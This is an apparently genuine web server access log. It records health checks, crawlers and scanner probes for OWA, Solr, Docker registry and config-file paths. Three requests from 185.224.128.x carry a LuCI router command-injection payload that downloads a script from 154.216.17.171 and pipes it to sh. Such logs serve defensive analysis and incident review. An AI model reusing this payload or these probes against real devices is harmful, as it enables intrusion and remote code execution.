195.56.55.225 - - [02/Sep/2024:17:27:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:29:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:31:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.98.11.173 - - [02/Sep/2024:17:32:47 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
212.95.49.158 - - [02/Sep/2024:17:33:21 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mkk.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:33:21 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:33:21 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:33:22 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:17:33:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.8.11.202 - - [02/Sep/2024:17:35:18 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:17:35:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:17:37:30 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.wwf.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:37:31 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:17:37:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET /odinhttpcall1725291567 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "POST /sdk HTTP/1.1" 404 279 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET /HNAP1 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET /evox/about HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
46.101.115.140 - - [02/Sep/2024:17:39:27 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
164.90.183.77 - - [02/Sep/2024:17:39:27 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
64.225.107.32 - - [02/Sep/2024:17:39:27 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
104.248.17.45 - - [02/Sep/2024:17:39:27 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
159.89.7.16 - - [02/Sep/2024:17:39:27 +0200] "\x16\x03\x01" 501 - "-" "-"
164.90.182.246 - - [02/Sep/2024:17:39:27 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
68.183.215.16 - - [02/Sep/2024:17:39:27 +0200] "GET /v2/_catalog HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
104.248.17.45 - - [02/Sep/2024:17:39:27 +0200] "\x16\x03\x01\x01$\x01" 501 - "-" "-"
64.225.107.32 - - [02/Sep/2024:17:39:27 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
159.89.7.16 - - [02/Sep/2024:17:39:27 +0200] "\x16\x03\x01" 501 - "-" "-"
159.89.7.16 - - [02/Sep/2024:17:39:27 +0200] "\x16\x03\x01" 501 - "-" "-"
195.56.55.225 - - [02/Sep/2024:17:39:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.76.71.100 - - [02/Sep/2024:17:40:16 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:17:41:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [02/Sep/2024:17:41:56 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [02/Sep/2024:17:43:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:17:43:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:17:44:50 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:17:46:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:17:46:39 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:46:39 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.pship.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:46:40 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:17:46:40 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:17:48:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:50:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:52:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:54:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.211.139.188 - - [02/Sep/2024:17:55:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:17:56:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:58:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:00:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.96.214.58 - - [02/Sep/2024:18:00:50 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:18:02:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:04:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
51.222.253.13 - - [02/Sep/2024:18:05:51 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.224.128.59 - - [02/Sep/2024:18:06:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:18:06:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:18:07:34 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:18:07:34 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:18:08:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
83.97.73.245 - - [02/Sep/2024:18:09:24 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:18:10:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.89.14 - - [02/Sep/2024:18:10:48 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
83.97.73.245 - - [02/Sep/2024:18:11:02 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.214.53.45 - - [02/Sep/2024:18:12:23 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:18:12:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:14:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:16:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:18:18:18 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
172.168.41.26 - - [02/Sep/2024:18:18:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 zgrab/0.x"
195.56.55.225 - - [02/Sep/2024:18:18:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:18:20:52 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.kora.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:18:20:52 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:18:20:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
172.168.41.26 - - [02/Sep/2024:18:21:25 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [02/Sep/2024:18:22:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:18:23:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:18:24:58 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:18:25:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.82.77.202 - - [02/Sep/2024:18:25:40 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.0.1583 Yowser/2.5 Safari/537.36"
80.82.77.202 - - [02/Sep/2024:18:25:59 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.0.1583 Yowser/2.5 Safari/537.36"
212.95.49.158 - - [02/Sep/2024:18:26:02 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:18:26:02 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:18:27:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.84 - - [02/Sep/2024:18:27:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
3.224.220.101 - - [02/Sep/2024:18:27:51 +0200] "GET /ovis HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
66.249.64.104 - - [02/Sep/2024:18:29:02 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.104 - - [02/Sep/2024:18:29:02 +0200] "GET /filmtext/Egyeb/Zizek-Lacan.pdf HTTP/1.1" 404 307 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [02/Sep/2024:18:29:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:31:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.84.89.2 - - [02/Sep/2024:18:31:43 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
141.98.11.173 - - [02/Sep/2024:18:32:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:18:33:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:35:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:37:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:18:38:22 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:18:38:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:18:39:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:41:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [02/Sep/2024:18:42:09 +0200] "GET /.well-known/acme-challenge/KPPHKU6NQUECMOGA0K7ZFC5X5T27T_A7 HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:18:42:09 +0200] "GET /.well-known/acme-challenge/F4AO0VWCSIKJ5Y-4MY6YZ6ORGEI9QSLH HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:18:42:09 +0200] "GET /.well-known/acme-challenge/MVCL40GD2EG-2_-D2MJOQ3RIKT92NTBX HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:18:42:09 +0200] "GET /.well-known/acme-challenge/ETCZU1ML8GU3NMFWR2W8O60HFJRCVJYZ HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:18:42:11 +0200] "GET /.well-known/acme-challenge/DCIKIG51K3XDU9O8Q8-6Q2MPPJV2OI06 HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:18:42:11 +0200] "GET /.well-known/acme-challenge/KZGO7EKFHR1C0K16AREMN51O4L6355G1 HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
66.249.64.65 - - [02/Sep/2024:18:42:33 +0200] "GET /www.bankwatch.org/downloads/eib.pdf HTTP/1.1" 404 313 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [02/Sep/2024:18:43:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:18:44:35 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.190.156.137 - - [02/Sep/2024:18:45:22 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:18:45:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:18:46:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:18:46:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:18:47:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:49:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:51:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
47.128.120.223 - - [02/Sep/2024:18:52:53 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.56.55.225 - - [02/Sep/2024:18:53:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:55:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
47.128.21.192 - - [02/Sep/2024:18:56:53 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.56.55.225 - - [02/Sep/2024:18:57:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:18:59:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:00:02 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.reflex.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:00:03 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
47.128.36.221 - - [02/Sep/2024:19:00:53 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.56.55.225 - - [02/Sep/2024:19:02:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
106.75.190.150 - - [02/Sep/2024:19:02:45 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 293 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:19:04:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:04:10 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:04:10 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
47.128.33.118 - - [02/Sep/2024:19:04:53 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.211.139.188 - - [02/Sep/2024:19:04:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.84 - - [02/Sep/2024:19:05:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:19:06:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:08:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:10:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:12:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:12:28 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:12:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:12:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:12:30 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:19:14:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:16:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:18:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:19:45 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:19:45 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:19:20:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:22:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:24:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:24:45 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.hemtc.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:24:45 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.190.156.137 - - [02/Sep/2024:19:25:55 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:19:26:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:28:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:30:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:32:36 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.simonyi.zpok.hu/owa/ HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:32:36 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:19:32:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:19:33:57 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
